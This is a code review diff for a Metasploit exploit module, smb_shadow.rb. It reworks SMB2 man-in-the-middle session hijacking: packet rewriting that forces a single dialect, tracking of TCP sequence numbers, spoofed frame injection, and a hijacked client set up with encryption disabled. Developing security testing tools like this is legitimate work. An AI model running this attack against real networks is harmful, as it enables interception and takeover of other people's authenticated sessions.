modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -278,59 +280,86 @@ def ipv4_addresses
-          case smb2[11..12]
-          when "\x00\x00" # Negotiate Protocol Request
-            smb_packet = RubySMB::SMB2::Packet::NegotiateRequest.read(smb2)
-            # Dialect Count Set To 1
-            smb_packet.dialect_count = 1
-            smb_packet.dialects = [smb_packet.dialects.first]
-            smb_packet.negotiate_context_list = []
-            smb_packet.client_start_time = 0
-            # Re-Calculate Length: (Optional...)
-            # nss = [smb_packet.to_binary_s.size].pack("N")
-            packet.payload = "#{nss}#{smb_packet.to_binary_s}"
-          when "\x00\x01" # Session Setup Request, NTLMSSP_AUTH
-            smb_packet = RubySMB::SMB2::Packet::SessionSetupRequest.read(smb2)
-            if smb_packet.smb2_header.session_id != 0
-              # Disable Session
-              @sessions[packet.tcp_header.tcp_src][:active] = false
-              @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
-              @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
-              # Start Main Thread
-              @main_threads << Rex::ThreadFactory.spawn("MainThread#{@sessions.find_index do |k, _|
-                k == packet.tcp_header.tcp_src
-              end }", false) do
-                main_thread(packet)
-              end
-            end
-          end
-        end
-        next unless @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active]
-
-        @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum]
-        @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum]
-        packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum]
-        packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum]
-        packet.eth_header.eth_src = str2mac(@mac)
-        packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
-        packet.recalc
-        packet.to_w(@interface)
+    loop do # In the future this loop should detect whether we have got a session for everyone on the network.
+      dispatcher = Msf::Exploit::SMB::MitmDispatcher.new(interface: @interface, mac: @mac)
+      @main_threads << Rex::ThreadFactory.spawn("MainThread#{dispatcher.session_id}", false) do
+        main_thread(dispatcher)
       end
+    rescue RubySMB::Error::NegotiationFailure => e
+      print_warning(e.message)
     end
   end
 
   # This handles a session that has already authenticated to the server.
   # This allows us to offload the session from the main capture thead.
+  def main_thread(dispatcher)
+    print_status('Entered main thread.')
+    client = RubySMB::Client.new(dispatcher, username: '', password: '')
```

Comment:
By setting the client required values here you are explicitly defining what the client requirements are for this interaction.
```suggestion
    client = RubySMB::Client.new(dispatcher, smb1: false, smb2: true, smb3: false, always_encrypt: false,  username: '', password: '')
```